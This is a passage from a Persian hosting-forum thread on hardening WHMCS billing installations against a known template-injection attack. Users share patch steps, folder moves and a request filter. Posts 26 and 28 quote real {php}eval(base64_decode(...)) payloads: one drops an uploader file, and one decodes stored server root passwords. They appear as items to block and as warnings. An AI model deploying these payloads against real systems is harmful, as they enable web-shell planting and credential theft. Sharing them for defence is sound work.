صفحه 3 از 4 نخستنخست 1234 آخرینآخرین
نمایش نتایج: از شماره 21 تا 30 , از مجموع 33

موضوع: آموزش رفع مشکل امنیتی whmcs

  1. #21
    عضو انجمن astro.alireza آواتار ها
    تاریخ عضویت
    Nov 2010
    محل سکونت
    تهران
    نوشته ها
    469
    تشکر تشکر کرده 
    350
    تشکر تشکر شده 
    1,292
    تشکر شده در
    690 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    نقل قول نوشته اصلی توسط tizparvaz نمایش پست ها
    بلاخره این کارو انجام بدیم بهتره یا ندیم
    منظور ایشون dm800pvr این بوده که بعد انجام این کار هک شدن ؟
    شما آخرین نسخه whmcs رو به صورت قانونی تهیه کنید و با توجه آموزش خود whmcs از لینک زیر اقدام کنید هیچ مشکلی پیش نمی یاد:
    Further Security Steps - WHMCS Documentation
    ما از این طریق اقدام کردیم و هک هم نشدیم

  2. # ADS




     

  3. #22
    کاربر اخراج شده
    تاریخ عضویت
    Feb 2010
    نوشته ها
    196
    تشکر تشکر کرده 
    0
    تشکر تشکر شده 
    139
    تشکر شده در
    112 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    من بالاخره موضوع این صفرها رو نفهمیدم

    مگه بدون تعریف دیتابیس و اینها پنل کار میکنه ؟

    دوستمون گفتم صفر بزارید اما تو این حالت مشکلی پیش نمی اد ؟ میشه یکم موضوع این صفرها رو باز کنید ؟

    <?php
    $license = "Leased-00000000000000";
    $db_host = "localhost";
    $db_username = "0000000000000000000";
    $db_password = "000000000000000000000";
    $db_name = "0000000000000000000000000";

  4. #23
    عضو دائم
    تاریخ عضویت
    Jan 2012
    محل سکونت
    تهران
    نوشته ها
    1,234
    تشکر تشکر کرده 
    665
    تشکر تشکر شده 
    4,063
    تشکر شده در
    2,642 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    نقل قول نوشته اصلی توسط astro.alireza نمایش پست ها
    شما آخرین نسخه whmcs رو به صورت قانونی تهیه کنید و با توجه آموزش خود whmcs از لینک زیر اقدام کنید هیچ مشکلی پیش نمی یاد:
    Further Security Steps - WHMCS Documentation
    ما از این طریق اقدام کردیم و هک هم نشدیم
    اینکارهارو کامل انجام دادم حالا واسه قضیه اون تیکت معروفی که میزنن و یه آپلودرو این حرفا میارن تو سایت واسه اون باید چیکار کرد ؟
    و چطوری باید چک کرد که آیا تا الان ان اتفاق افتاده یا نه

  5. #24
    عضو دائم RoobinaServer آواتار ها
    تاریخ عضویت
    Mar 2012
    محل سکونت
    Tehran | تلگرام : @rbserver | کانال تلگرام : @roobinaserver
    نوشته ها
    2,598
    تشکر تشکر کرده 
    438
    تشکر تشکر شده 
    7,424
    تشکر شده در
    5,193 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    نقل قول نوشته اصلی توسط fun_9990 نمایش پست ها
    من بالاخره موضوع این صفرها رو نفهمیدم

    مگه بدون تعریف دیتابیس و اینها پنل کار میکنه ؟

    دوستمون گفتم صفر بزارید اما تو این حالت مشکلی پیش نمی اد ؟ میشه یکم موضوع این صفرها رو باز کنید ؟

    <?php
    $license = "Leased-00000000000000";
    $db_host = "localhost";
    $db_username = "0000000000000000000";
    $db_password = "000000000000000000000";
    $db_name = "0000000000000000000000000";
    دوست من ایشون فایل کانفیگ خودشون رو مثال زدن و جای نام دیتابیس خودشون 000 زدن شما دیتابیس خودتون رو قرار بدید نمیتونن ایشون تو مثال یوزر و پسورد دیتابیس خودشون رو قرار بدن که

    ---------- Post added at 10:32 AM ---------- Previous post was at 10:30 AM ----------

    نقل قول نوشته اصلی توسط tizparvaz نمایش پست ها
    اینکارهارو کامل انجام دادم حالا واسه قضیه اون تیکت معروفی که میزنن و یه آپلودرو این حرفا میارن تو سایت واسه اون باید چیکار کرد ؟
    و چطوری باید چک کرد که آیا تا الان ان اتفاق افتاده یا نه
    اگر هکر یک هکر واقعی باشه و خودش کد base64 رو دستکاری کرده باشه که میشه خیلی راحت هم اینکارو کرد ممکنه تو هر پوشه ای از فایلهای شما اینکارو کرده باشه

    اگر کسی قبلا چنین تیکت هایی ارسال کرده و حذفش نکردید اون کد رو بریزید تو نود پد

    پ.خ کنید تا بگم کجا دست برده. (دیکد بکنم براتون)
    میزبان داده پرداز - روبینا سرور - (تلفن و راه های ارتباطی - Roobinaserver.ir)
    پرووایدر خدمات دیتاسنتری در تهران
    از سال 1385 تا کنون


  6. #25
    عضو دائم
    تاریخ عضویت
    Jan 2012
    محل سکونت
    تهران
    نوشته ها
    1,234
    تشکر تشکر کرده 
    665
    تشکر تشکر شده 
    4,063
    تشکر شده در
    2,642 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    اگر هکر یک هکر واقعی باشه و خودش کد base64 رو دستکاری کرده باشه که میشه خیلی راحت هم اینکارو کرد ممکنه تو هر پوشه ای از فایلهای شما اینکارو کرده باشه

    اگر کسی قبلا چنین تیکت هایی ارسال کرده و حذفش نکردید اون کد رو بریزید تو نود پد

    پ.خ کنید تا بگم کجا دست برده. (دیکد بکنم براتون)[/QUOTE]

    نه دست نبرده فقط میخوام بدونم همین کارها کافیه یا باید کار دیگه ای هم انجام بشه ؟

  7. #26
    عضو انجمن hossein535 آواتار ها
    تاریخ عضویت
    Mar 2012
    محل سکونت
    World Wide Web
    نوشته ها
    135
    تشکر تشکر کرده 
    143
    تشکر تشکر شده 
    109
    تشکر شده در
    70 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    نقل قول نوشته اصلی توسط maryam1 نمایش پست ها
    اول از همه نصب پچ امنیتی که در آدرس زیر هست
    Security Patch - WHMCS Forums
    و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه
    بعد برید داخل فایل
    configuration.php
    و اونو به این شکل در بیارید
    کد PHP:
    <?php
    $license 
    "Leased-00000000000000";
    $db_host "localhost";
    $db_username "0000000000000000000";
    $db_password "000000000000000000000";
    $db_name "0000000000000000000000000";
    $cc_encryption_hash "0000000000000000000000000000000000000";
    $templates_compiledir "/home/username/templates_c/";
    $attachments_dir "/home/username/attachments/";
    $downloads_dir "/home/username/downloads/";  
    ?>
    به جای username نام کاربری یوزر سیپنل رو بنویسید
    و کار آخر هم اینه که برید قسمت Spam Control درون مدیریت whmcs و تو قسمت سابپکت دو کد هک
    کد PHP:
     {php}eval(base64_decode('  JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRz   hnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2   YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TF   dSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhC   c2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1   pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5U   QWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSn   pkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNi   MkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMT   kxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhB   WTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WV   cxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNk   ZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVE   lDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElI   c2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3   ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8g   PSBmb3Blbigia2lyLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJG  NvZGUpOw=='));{/php
    کد PHP:
     {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq  MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS  aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2  SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ  anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp  QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3  blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs  SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl  eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI  ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J  K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKCJkb3dubG9hZHMvYjB4LnBocCIs  InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php
    را بلوک کنید

    به همین راحتی
    دسترسی فایل کانفیگم بذارید رو 444

    فقط پچ رو علاوه بر جایی که
    whmcs
    رو نصب کردید داخل
    include
    هم نصب کنید
    با عرض سلام -من هرکار کردم نتونستم جای پوشه ها را عوض کنم یعنی تا کد را میزارم این اخطار را میده
    The templates compiling directory '/home/***********/templates_c/' must be writeable (CHMOD 777) before you can continue.
    If the path shown is incorrect, you can update it in the configuration.php file.

    فرض کنید من whcms را در پوشه clinet قرار دادم و 3 تا پوشه یاد شد را در پوشه a قرار دادم حالا کدم به چه صورت میشه ؟




    "و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه"

    این لوکال کجا است ؟ دقیقا اسم پوشه اش چیه من پوشه ای به این نام ندیدم ؟
    با تشکر
    ویرایش توسط hossein535 : April 9th, 2012 در ساعت 13:44

  8. #27
    عضو انجمن hamidjan آواتار ها
    تاریخ عضویت
    Mar 2010
    محل سکونت
    PartoData.com
    نوشته ها
    236
    تشکر تشکر کرده 
    154
    تشکر تشکر شده 
    296
    تشکر شده در
    195 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    سه تا پوشه گفته شده رو نباید توی پوشه a قرار بدید.
    فرض کنید سه پوشه این ها هستند:
    $templates_compiledir = "/home/hamid/public_html/client/templates_c/";
    $attachments_dir = "/home/
    hamid/public_html/client/attachments/";
    $downloads_dir = "/home/
    hamid/public_html/client/downloads/";

    مثلا whmcs شما هست:
    /home/hamid/public_html/client

    حالا اون سه پوشه رو میزارید توی آدرس زیر:
    home/hamid
    و در فایل configuration.php هم کدهای گفته شده رو میزارید:

    $templates_compiledir = "/home/hamid/templates_c/";
    $attachments_dir = "/home/
    hamid/attachments/";
    $downloads_dir = "/home/
    hamid/downloads/";
    شرکت پرتو فرا رایان ، ارائه دهنده سرویس های میزبانی وب ، ثبت دامنه ، نمایندگی هاست و دامنه ، طراحی وب و...

    PartoData.com
    [+]
    ,Services : WebHosting , Domain Registration , Reseller , FileHosting [+]
    Server Locations : Iran , UK [+]

  9. تعداد تشکر ها ازhamidjan به دلیل پست مفید


  10. #28
    کاربر اخراج شده
    تاریخ عضویت
    Jan 2010
    نوشته ها
    116
    تشکر تشکر کرده 
    1
    تشکر تشکر شده 
    103
    تشکر شده در
    72 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    سلام و خسته نباشید امروز متوجه شدم یکی از دوستان عزیزمون بازم یه کد جدید پیدا کرده که نیمه کاره کپی کرده ولی برای شما هم میگذارم تا با اون آشنا بشید این کد بیس 64 شده اش هست

    {php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1c mF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSg iU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kd GV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9 TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcc lxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF 1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzc yddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHl wZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2Z SddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0 KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sI CRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4 iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2Z SAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWU gJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwY WRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR 1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkI CRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKio qKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0Z Xh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIT1N UIFJPT1RTICMjIyMjIyMjIyM

    که بعد از کد گشای تقریبا یه همچین چیزی میشه

    zm^r^
    include('configuration.php');

    $query = mysql_query("SELECT * FROM tblservers");
    $text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
    while($v = mysql_fetch_array($query)) {

    $ipaddress = $v['ipaddress'];
    $username = $v['username'];
    $type = $v['type'];
    $active = $v['active'];
    $hostname = $v['hostname'];


    $password = decrypt ($v['password'], $cc_encryption_hash);

    $text=$text."Type $type\r\n";
    $text=$text."Active $active\r\n";
    $text=$text."Hostname $hostname\r\n";
    $text=$text."Ip $ipaddress\r\n";
    $text=$text."Username $username\r\n";
    $text=$text."Password $password\r\n************************************* *\r\n";


    }
    $text=$text."\r\n######################### HOST ROOTS ##########

    اگه به کدش توجه کنید با شامل کردن فایل کانفیگ از تیبل سرور میخواد یوزر و پسورد هاست ها رو به دست بیاره

    همون طوری که در این سایت هم خواندید با بلوک کردن php و آپدیت به آخرین ورژن میشه جلوی این جور ایمیل ها رو گرفت .
    جالب این جاست که هم وطنان خودمون میان این کارها رو انجام میدن .
    با تشکر از مدیریت وب هاستینگ تالک . مرادپور

  11. #29
    عضو دائم Ashkankamangar.ir آواتار ها
    تاریخ عضویت
    Jun 2010
    محل سکونت
    wien , Österreich
    نوشته ها
    1,342
    تشکر تشکر کرده 
    1,509
    تشکر تشکر شده 
    4,086
    تشکر شده در
    2,328 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    بعد از اینکه تمام مراحل امنیتی رو اکی کردید
    داخل فایل کانفیگ این کدو بذارید
    foreach ($_REQUEST as $value)
    {
    if(strpos(strtolower($value), "{php}") !== false)
    die("Hacking Attempt !");
    }
    جای Hacking Attempt هر دردو دلی با اون هکر .... داشتی میتونی بنویسی

  12. تعداد تشکر ها ازAshkankamangar.ir به دلیل پست مفید


  13. #30
    عضو جدید farsitools آواتار ها
    تاریخ عضویت
    Apr 2010
    محل سکونت
    Yahoo ID: gvps_ir
    نوشته ها
    80
    تشکر تشکر کرده 
    2
    تشکر تشکر شده 
    84
    تشکر شده در
    70 پست

    پیش فرض پاسخ : آموزش رفع مشکل امنیتی whmcs

    بله با توجه به روش دوست گلمون Ashkankamangar.ir بايد در نظر داشت كه whmcs خودش جايي براي اين كد نويسي ها در نظر گرفته است
    با يك كد نويسي ساده از دست اين اسپام ها خلاص شديم علاوه بر اين امنيت قسمت هاي ديگه هم را در كنترل گرفتيم و حالا هر كس اقدام كنه بي برو برگرد بن ميشه
    با توجه به اين كه جوجه هكرا جز اسپام مزاحمت ديگه اي نداشتن و معمولا با ويـ بيـ انـ وصل ميشن با بن شدن دسشون بد جوري كوتا ميشه و
    wWw.Gvps.ir
    VPS ايران | ترافيك نامحدود
    www.Gvps.ir

صفحه 3 از 4 نخستنخست 1234 آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. شراکت در 2 سایت (آموزشی آرایشی - آموزشی امنیتی )
    توسط 666regab در انجمن به دنبال کارمند هستم
    پاسخ ها: 0
    آخرين نوشته: February 26th, 2016, 14:44
  2. پاسخ ها: 8
    آخرين نوشته: February 2nd, 2014, 13:42
  3. این کارای امنیتی whmcs 5.2 چیه ؟
    توسط mohammad73 در انجمن سوالات و مشکلات
    پاسخ ها: 1
    آخرين نوشته: October 18th, 2013, 00:36

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •